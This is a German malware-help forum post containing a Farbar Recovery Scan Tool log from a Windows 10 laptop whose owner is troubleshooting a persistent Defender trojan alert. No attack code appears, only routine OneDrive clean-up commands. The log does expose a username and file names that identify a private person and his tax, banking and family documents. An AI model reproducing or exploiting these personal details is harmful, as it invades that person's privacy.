Trojaner-Board - Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR

Trojaner-Board (https://www.trojaner-board.de/)

- Log-Analyse und Auswertung (https://www.trojaner-board.de/log-analyse-auswertung/)

- - Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR (https://www.trojaner-board.de/200735-windows-defender-meldet-dauerhaft-trojandropper-win64-tnega-msr.html)

Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR

FRST Log:

Code:

Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 05-01-2021

durchgeführt von ***** (Administrator) auf PC5-L (FUJITSU LIFEBOOK A357) (09-01-2021 15:07:39)

Gestartet von C:\Users\*****\Downloads

Geladene Profile: *****

Platform: Windows 10 Pro Version 20H2 19042.685 (X64) Sprache: Deutsch (Deutschland)

Standard-Browser: Edge

Start-Modus: Normal
 

==================== Prozesse (Nicht auf der Ausnahmeliste) =================
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)
 

(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe

(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApntEx.exe

(ALPS ELECTRIC CO., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe

(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\hidfind.exe

(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\HidMonitorSvc.exe

(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe

(Apple Inc. -> Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe

(Apple Inc. -> Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe

(Apple Inc. -> Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe

(DATEV eG 08 2 -> DATEV eG) C:\Program Files (x86)\DATEV\PROGRAMM\SiPaCompact\SiPaHost.exe

(DATEV eG 08 2 -> DATEV eG) C:\Program Files (x86)\DATEV\PROGRAMM\SiPaCompact\SiPaHostService.exe

(DISPLAYLINK (UK) LIMITED -> DisplayLink Corp.) C:\Program Files\DisplayLink Core Software\DisplayLinkTrayApp.exe

(FUJITSU CLIENT COMPUTING LIMITED -> FUJITSU CLIENT COMPUTING LIMITED) C:\Windows\System32\DriverStore\FileRepository\fuj02e3.inf_amd64_b472ee039d0bcad8\fuj02e3-utility.exe

(Google Inc -> Google Inc.) C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

(Google Inc -> Google) C:\Users\*****\AppData\Local\Google\Chrome\User Data\SwReporter\36.184.200\software_reporter_tool.exe <3>

(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <8>

(Hewlett Packard -> HP Inc.) C:\Program Files\HP\HP OfficeJet Pro 7740 series\Bin\ScanToPCActivationApp.exe

(Intel(R) Embedded Subsystems and IP Blocks Group -> Intel Corporation) C:\Windows\Intel\Intel(R) Management Engine Components\LMS\LMS.exe

(Intel(R) Embedded Subsystems and IP Blocks Group -> Intel Corporation) C:\Windows\System32\jhi_service.exe

(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_62f096fe77e085c0\igfxCUIService.exe

(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_62f096fe77e085c0\igfxEM.exe

(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_62f096fe77e085c0\IntelCpHDCPSvc.exe

(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_62f096fe77e085c0\IntelCpHeciSvc.exe

(Intel(R) Wireless Connectivity Solutions -> Intel Corporation) C:\Windows\System32\ibtsiva.exe

(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe

(Microsoft Corporation -> Microsoft Corporation) C:\Users\*****\AppData\Local\Microsoft\OneDrive\OneDrive.exe

(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <2>

(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe

(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe

(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\MsMpEng.exe

(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\NisSrv.exe

(Shrew Soft Inc -> ) C:\Program Files\ShrewSoft\VPN Client\iked.exe

(Shrew Soft Inc -> ) C:\Program Files\ShrewSoft\VPN Client\ipsecd.exe

(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
 

==================== Registry (Nicht auf der Ausnahmeliste) ===================
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)
 

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [18391120 2019-12-11] (Realtek Semiconductor Corp. -> Realtek Semiconductor)

HKLM\...\Run: [DisplayLinkTrayApp] => C:\Program Files\DisplayLink Core Software\DisplayLinkTrayApp.exe [2221888 2018-11-21] (DISPLAYLINK (UK) LIMITED -> DisplayLink Corp.)

HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [331064 2020-07-24] (Apple Inc. -> Apple Inc.)

HKLM-x32\...\Run: [DVCServ] => C:\Program Files (x86)\DATEV\PROGRAMM\SipaCompact\SiPaHost.exe [1094160 2020-10-20] (DATEV eG 08 2 -> DATEV eG)

HKU\S-1-5-19\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518656 2019-12-07] (Microsoft Windows -> Microsoft Corporation)

HKU\S-1-5-20\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518656 2019-12-07] (Microsoft Windows -> Microsoft Corporation)

HKU\S-1-5-21-4192198180-2913720414-2796424460-1001\...\Run: [HP OfficeJet Pro 7740 (NET)] => C:\Program Files\HP\HP OfficeJet Pro 7740 series\Bin\ScanToPCActivationApp.exe [3770504 2018-04-06] (Hewlett Packard -> HP Inc.)

HKU\S-1-5-21-4192198180-2913720414-2796424460-1001\...\RunOnce: [Uninstall 18.212.1021.0008\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\*****\AppData\Local\Microsoft\OneDrive\18.212.1021.0008\amd64"

HKU\S-1-5-21-4192198180-2913720414-2796424460-1001\...\RunOnce: [Uninstall 18.212.1021.0008] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\*****\AppData\Local\Microsoft\OneDrive\18.212.1021.0008"

HKU\S-1-5-21-4192198180-2913720414-2796424460-1001\...\RunOnce: [Delete Cached Update Binary] => C:\WINDOWS\system32\cmd.exe /q /c del /q "C:\Users\*****\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe"

HKU\S-1-5-21-4192198180-2913720414-2796424460-1001\...\RunOnce: [Delete Cached Standalone Update Binary] => C:\WINDOWS\system32\cmd.exe /q /c del /q "C:\Users\*****\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe"

HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\87.0.4280.141\Installer\chrmstp.exe [2021-01-07] (Google LLC -> Google LLC)

HKLM\Software\...\Authentication\Credential Providers: [{2BF59B80-2BCF-4CD1-83F7-06FECD227D00}] -> C:\WINDOWS\System32\DVCCSAVdstCredentialProvider64.dll [2020-10-20] (DATEV eG -> DATEV eG)

HKLM\Software\...\Authentication\Credential Providers: [{2BF59B80-2BCF-4CD1-83F7-06FECD227D01}] -> C:\WINDOWS\System32\DVCCSAVdstReaderSelectionProvider64.dll [2020-10-20] (DATEV eG -> DATEV eG)

HKLM\Software\...\Authentication\Credential Provider Filters: [{2BF59B80-2BCF-4CD1-83F7-06FECD227D00}] -> C:\WINDOWS\System32\DVCCSAVdstCredentialProvider64.dll [2020-10-20] (DATEV eG -> DATEV eG)

HKLM\Software\...\Authentication\Credential Provider Filters: [{2BF59B80-2BCF-4CD1-83F7-06FECD227D01}] -> C:\WINDOWS\System32\DVCCSAVdstReaderSelectionProvider64.dll [2020-10-20] (DATEV eG -> DATEV eG)

Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ControlCenter.lnk [2018-12-19]

ShortcutTarget: ControlCenter.lnk -> C:\Program Files (x86)\T-Home\Eumex 800 V1.30\ControlCenter.exe (T-Com) [Datei ist nicht signiert]

Startup: C:\Users\buskr5\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Laufwerke.bat [2019-01-27] () [Datei ist nicht signiert]
 

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
 

Task: {08177AF7-895C-4CDE-BB61-C67AFF7D9DED} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)

Task: {1110DE16-C375-4BCA-B72F-AF617B0D8FFC} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [116584 2020-12-24] (Microsoft Corporation -> Microsoft Corporation)

Task: {12C84621-CAA5-4F59-9214-474125FF1AE5} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23054216 2020-12-19] (Microsoft Corporation -> Microsoft Corporation)

Task: {19520EC2-6F12-4753-9C89-63BFAACB92B5} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [116584 2020-12-24] (Microsoft Corporation -> Microsoft Corporation)

Task: {2AC510A4-884D-4FFB-9DD3-0C03B2C19EFE} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-12-17] (Google Inc -> Google Inc.)

Task: {62E7827E-C7E1-4C4E-8B46-FF865E056192} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1349200 2020-11-03] (Adobe Inc. -> Adobe Inc.)

Task: {76D7BBAC-71A9-42F5-AF51-1E7C1279F625} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23054216 2020-12-19] (Microsoft Corporation -> Microsoft Corporation)

Task: {7F233437-8600-49D7-858A-20C54C7C6662} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-12-17] (Google Inc -> Google Inc.)

Task: {81A5CFF9-F6A7-420D-9945-4DA1E902C9A6} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)

Task: {9144CA0D-EED9-468E-8BEF-2311B88B92EC} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)

Task: {D67B4130-3DDC-43C9-B002-8ABDC0AB5DD0} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonx86\Microsoft Shared\Office16\OLicenseHeartbeat.exe [1149336 2020-12-24] (Microsoft Corporation -> Microsoft Corporation)

Task: {DE27C544-B106-4C7D-9BF3-78CA0EA1F81A} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)
 
 

==================== Internet (Nicht auf der Ausnahmeliste) ====================
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)
 

Winsock: Catalog5 08 C:\Program Files (x86)\Bonjour\mdnsNSP.dll [122128 2015-08-12] (Apple Inc. -> Apple Inc.)

Winsock: Catalog5-x64 08 C:\Program Files\Bonjour\mdnsNSP.dll [133392 2015-08-12] (Apple Inc. -> Apple Inc.)

Tcpip\Parameters: [DhcpNameServer] 192.168.178.1

Tcpip\..\Interfaces\{379cb8d3-10a1-4062-b840-8afb6c84784b}: [DhcpNameServer] 192.168.10.1

Tcpip\..\Interfaces\{4cec849f-a057-45bf-a346-ef6290670ce0}: [NameServer] 192.168.10.1

Tcpip\..\Interfaces\{8d46b3e8-e3e4-4d57-9ac0-d4bf3d80561a}: [DhcpNameServer] 192.168.1.250

Tcpip\..\Interfaces\{d94cdd1b-4d3b-485d-8a86-23879c01e60c}: [DhcpNameServer] 192.168.178.1

Tcpip\..\Interfaces\{fb4f79cc-731d-4165-b863-585f13ab9b6f}: [DhcpNameServer] 192.168.178.1
 

Edge: 

======

DownloadDir: C:\Users\*****\Downloads

Edge Profile: C:\Users\*****\AppData\Local\Microsoft\Edge\User Data\Default [2021-01-09]

Edge StartupUrls: Default -> "hxxp://google.de/"
 

FireFox:

========

FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2020-09-16] (Microsoft Corporation -> Microsoft Corporation)

FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-12-07] (Adobe Inc. -> Adobe Systems Inc.)
 

Chrome: 

=======

CHR Profile: C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default [2021-01-09]

CHR Extension: (Präsentationen) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-12-17]

CHR Extension: (Docs) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2018-12-19]

CHR Extension: (Google Drive) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2021-01-09]

CHR Extension: (YouTube) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-12-19]

CHR Extension: (Tabellen) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-12-17]

CHR Extension: (Google Docs Offline) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2021-01-09]

CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-01-09]

CHR Extension: (Google Mail) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2021-01-09]

CHR Extension: (Chrome Media Router) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2021-01-09]
 

==================== Dienste (Nicht auf der Ausnahmeliste) ===================
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
 

R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [170056 2020-11-03] (Adobe Inc. -> Adobe Inc.)

R2 ApHidMonitorService; C:\Program Files\Apoint2K\HidMonitorSvc.exe [105240 2017-10-12] (Alps Electric Co., LTD. -> Alps Electric Co., Ltd.)

R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [96056 2020-05-20] (Apple Inc. -> Apple Inc.)

R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [9105800 2020-12-01] (Microsoft Corporation -> Microsoft Corporation)

R2 DATEV Sicherheitspaket-Basis-Dienst; C:\Program Files (x86)\DATEV\PROGRAMM\SiPaCompact\SiPaHostService.exe [408592 2020-10-20] (DATEV eG 08 2 -> DATEV eG)

S3 FBIOSDRVService; C:\WINDOWS\System32\DriverStore\FileRepository\fbiosdrv.inf_amd64_34d91384b27330e6\fbiosdrv-service.exe [130200 2020-06-29] (FUJITSU CLIENT COMPUTING LIMITED -> FUJITSU CLIENT COMPUTING LIMITED)

R2 Fuj02e3DriverUtilityService; C:\WINDOWS\System32\DriverStore\FileRepository\fuj02e3.inf_amd64_b472ee039d0bcad8\fuj02e3-utility.exe [177432 2019-05-09] (FUJITSU CLIENT COMPUTING LIMITED -> FUJITSU CLIENT COMPUTING LIMITED)

R2 iked; C:\Program Files\ShrewSoft\VPN Client\iked.exe [1127736 2013-07-01] (Shrew Soft Inc -> )

R2 ipsecd; C:\Program Files\ShrewSoft\VPN Client\ipsecd.exe [810808 2013-07-01] (Shrew Soft Inc -> )

S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5197552 2020-12-09] (Microsoft Windows Publisher -> Microsoft Corporation)

R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [12720144 2020-11-18] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)

R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\NisSrv.exe [2491880 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)

R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MsMpEng.exe [128376 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
 

===================== Treiber (Nicht auf der Ausnahmeliste) ===================
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
 

S3 dlcdcncm; C:\WINDOWS\System32\drivers\dlcdcncm62_x64.sys [92400 2017-05-29] (DISPLAYLINK -> DisplayLink Corp.)

S3 dlusbaudio; C:\WINDOWS\system32\DRIVERS\dlusbaudio_x64.sys [238320 2017-05-29] (DISPLAYLINK -> DisplayLink Corp.)

R3 FBIOSDRV; C:\WINDOWS\System32\DriverStore\FileRepository\fbiosdrv.inf_amd64_34d91384b27330e6\FBIOSDRV.sys [43672 2020-06-29] (FUJITSU CLIENT COMPUTING LIMITED -> FUJITSU CLIENT COMPUTING LIMITED)

R3 fuj02e3; C:\WINDOWS\System32\DriverStore\FileRepository\fuj02e3.inf_amd64_b472ee039d0bcad8\fuj02e3.sys [59672 2019-05-09] (FUJITSU CLIENT COMPUTING LIMITED -> FUJITSU CLIENT COMPUTING LIMITED)

R3 GabiAcpi; C:\WINDOWS\System32\drivers\GabiAcpi.sys [40488 2020-07-15] (FUJITSU CLIENT COMPUTING LIMITED -> Fujitsu Technology Solutions)

U5 KOBCCID; C:\Windows\System32\Drivers\KOBCCID.sys [116864 2019-01-16] (KOBIL Systems GmbH) [Datei ist nicht signiert]

S3 KobilCcid; C:\WINDOWS\System32\drivers\KobilCcid_x64.sys [50432 2019-10-21] (KOBIL Systems GmbH -> KOBIL Systems GmbH)

S3 USBAAPL64; C:\WINDOWS\System32\Drivers\usbaapl64.sys [54784 2020-05-06] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.)

S3 usbrndis6; C:\WINDOWS\System32\drivers\usb80236.sys [24064 2019-12-07] (Microsoft Corporation) [Datei ist nicht signiert]

R1 vflt; C:\WINDOWS\system32\DRIVERS\vfilter.sys [24064 2013-07-01] (Microsoft Windows Hardware Compatibility Publisher -> Shrew Soft Inc)

S3 vnet; C:\WINDOWS\System32\drivers\virtualnet.sys [17408 2013-07-01] (Microsoft Windows Hardware Compatibility Publisher -> Shrew Soft Inc)

S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [48536 2020-12-04] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)

S3 WDC_SAM; C:\WINDOWS\System32\drivers\wdcsam64.sys [35584 2018-02-26] (WDKTestCert wdclab,130885612892544312 -> Western Digital Technologies, Inc.)

R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [429296 2020-12-04] (Microsoft Windows -> Microsoft Corporation)

R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [70896 2020-12-04] (Microsoft Windows -> Microsoft Corporation)
 

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
 
 

==================== Ein Monat (erstellte) (Nicht auf der Ausnahmeliste) =========
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
 

2021-01-09 15:07 - 2021-01-09 15:08 - 000019490 _____ C:\Users\*****\Downloads\FRST.txt

2021-01-09 15:05 - 2021-01-09 15:08 - 000000000 ____D C:\FRST

2021-01-09 15:05 - 2021-01-09 15:05 - 002282496 _____ (Farbar) C:\Users\*****\Downloads\FRST64.exe

2021-01-09 15:03 - 2021-01-09 15:03 - 000000000 ____D C:\Users\*****\Desktop\Verkn

2021-01-09 15:03 - 2021-01-09 15:03 - 000000000 ____D C:\Users\*****\AppData\Roaming\Apple Computer

2021-01-09 15:02 - 2021-01-09 15:03 - 000000000 ____D C:\Users\*****\AppData\Local\Intel

2021-01-07 19:12 - 2021-01-07 19:12 - 000024546 _____ C:\Users\buskr5\Documents\bookmarks_07.01.21.html

2021-01-07 19:11 - 2021-01-07 19:11 - 000048978 _____ C:\Users\buskr5\Documents\cc_20210107_191149.reg

2021-01-07 19:09 - 2021-01-07 19:10 - 000000000 ____D C:\Users\buskr5\Downloads\ccsetup575

2021-01-07 18:52 - 2021-01-07 18:59 - 000000000 ____D C:\AdwCleaner

2021-01-05 09:49 - 2021-01-05 09:49 - 000012437 _____ C:\Users\buskr5\Downloads\Werkdienstwohnung-Werkmietwohnung.pdf

2020-12-21 10:10 - 2020-12-21 10:10 - 000345367 _____ C:\Users\buskr5\Downloads\LRA-WM_ZS_Was_braucht_man_wann_zur_Zulassung_10-2019.pdf

2020-12-21 10:10 - 2020-12-21 10:10 - 000013851 _____ C:\Users\buskr5\Downloads\Erklärung_an_Eides_Statt.pdf

2020-12-21 10:09 - 2020-12-21 10:09 - 000280628 _____ C:\Users\buskr5\Downloads\SEPA_Kombimandat.pdf

2020-12-21 10:04 - 2020-12-21 10:04 - 000020116 _____ C:\Users\buskr5\Downloads\Vollmacht (1).pdf

2020-12-17 08:20 - 2020-12-17 08:20 - 000000000 ____D C:\Users\buskr5\Documents\Lea Schule

2020-12-14 12:10 - 2020-12-14 12:10 - 000196173 _____ C:\Users\buskr5\Desktop\untermietvertrag-mustervorlage-word-pdf.pdf

2020-12-14 11:35 - 2020-12-15 10:33 - 000000000 ____D C:\Users\buskr5\Desktop\Neuer Ordner (3)

2020-12-14 11:35 - 2020-12-15 10:33 - 000000000 ____D C:\Users\buskr5\Desktop\Isi

2020-12-10 08:55 - 2020-12-10 08:55 - 000427266 _____ C:\Users\buskr5\Downloads\Krieger Handelsbericht 2019 (1).pdf

2020-12-10 08:50 - 2020-12-10 08:50 - 000336734 _____ C:\Users\buskr5\Downloads\ESt Krieger, Roland 2019.pdf

2020-12-10 08:47 - 2020-12-10 08:47 - 000427266 _____ C:\Users\buskr5\Downloads\Krieger Handelsbericht 2019.pdf

2020-12-10 08:47 - 2020-12-10 08:47 - 000199415 _____ C:\Users\buskr5\Downloads\Krieger Steuerbericht 2019.pdf

2020-12-10 08:45 - 2020-12-10 08:45 - 000140074 _____ C:\Users\buskr5\Downloads\GewSt Krieger Roland 2019.pdf
 

==================== Ein Monat (geänderte) ==================
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
 

2021-01-09 15:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\AppReadiness

2021-01-09 15:04 - 2020-07-16 08:02 - 000003368 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-4192198180-2913720414-2796424460-1001

2021-01-09 15:04 - 2020-07-15 21:58 - 000002395 _____ C:\Users\*****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk

2021-01-09 15:04 - 2018-12-17 09:54 - 000000000 ___RD C:\Users\*****\OneDrive

2021-01-09 15:03 - 2018-12-17 11:01 - 000000000 ____D C:\Users\*****\AppData\Local\Adobe

2021-01-09 15:03 - 2018-12-17 09:52 - 000000000 ____D C:\Users\*****\AppData\Local\Packages

2021-01-09 15:02 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel

2021-01-09 15:02 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps

2021-01-09 15:02 - 2018-12-17 10:05 - 000000000 __SHD C:\Users\*****\IntelGraphicsProfiles

2021-01-09 15:02 - 2018-12-17 09:52 - 000000000 __RHD C:\Users\Public\AccountPictures

2021-01-09 15:02 - 2018-12-17 09:52 - 000000000 ___RD C:\Users\*****\3D Objects

2021-01-09 15:02 - 2018-12-17 09:52 - 000000000 ____D C:\Users\*****\AppData\Local\ConnectedDevicesPlatform

2021-01-09 15:01 - 2020-06-16 05:58 - 000002436 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk

2021-01-09 15:00 - 2018-12-17 10:52 - 000000000 __SHD C:\Users\buskr5\IntelGraphicsProfiles

2021-01-07 19:45 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft

2021-01-07 19:13 - 2018-12-18 08:26 - 000002328 _____ C:\Users\buskr5\Desktop\INCOGNITO.lnk

2021-01-07 17:24 - 2020-07-16 08:03 - 001632020 _____ C:\WINDOWS\system32\PerfStringBackup.INI

2021-01-07 17:24 - 2019-12-07 15:51 - 000707136 _____ C:\WINDOWS\system32\perfh007.dat

2021-01-07 17:24 - 2019-12-07 15:51 - 000142394 _____ C:\WINDOWS\system32\perfc007.dat

2021-01-07 17:24 - 2019-12-07 10:13 - 000000000 ____D C:\WINDOWS\INF

2021-01-07 17:17 - 2020-12-07 10:38 - 000000000 ____D C:\Program Files (x86)\TeamViewer

2021-01-07 17:17 - 2020-07-16 08:02 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT

2021-01-07 17:17 - 2020-07-16 07:55 - 000008192 ___SH C:\DumpStack.log.tmp

2021-01-07 17:17 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ServiceState

2021-01-07 17:17 - 2019-12-07 10:03 - 000786432 _____ C:\WINDOWS\system32\config\BBI

2021-01-07 16:34 - 2020-07-16 07:55 - 000000000 ____D C:\WINDOWS\system32\SleepStudy

2021-01-07 07:23 - 2018-12-17 10:52 - 000000000 ____D C:\Users\buskr5\AppData\Local\Packages

2021-01-07 07:21 - 2018-12-17 17:20 - 000002293 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk

2021-01-05 12:52 - 2018-12-20 11:36 - 000002248 ____H C:\Users\buskr5\Documents\Default.rdp

2021-01-05 12:41 - 2019-12-07 15:52 - 000000000 ____D C:\WINDOWS\system32\FxsTmp

2021-01-05 12:04 - 2019-04-30 07:26 - 000031577 _____ C:\Users\buskr5\Desktop\Monatliche Abzüge.xlsx

2020-12-28 09:55 - 2019-11-12 09:00 - 000000000 ____D C:\Users\buskr5\Desktop\Neuer Ordner

2020-12-27 10:42 - 2018-12-17 10:24 - 000000000 ____D C:\Program Files (x86)\Microsoft Office

2020-12-17 12:50 - 2020-07-16 08:02 - 000003362 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-4192198180-2913720414-2796424460-1002

2020-12-17 12:50 - 2020-07-15 21:58 - 000002386 _____ C:\Users\buskr5\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk

2020-12-17 12:50 - 2018-12-17 10:54 - 000000000 ___RD C:\Users\buskr5\OneDrive

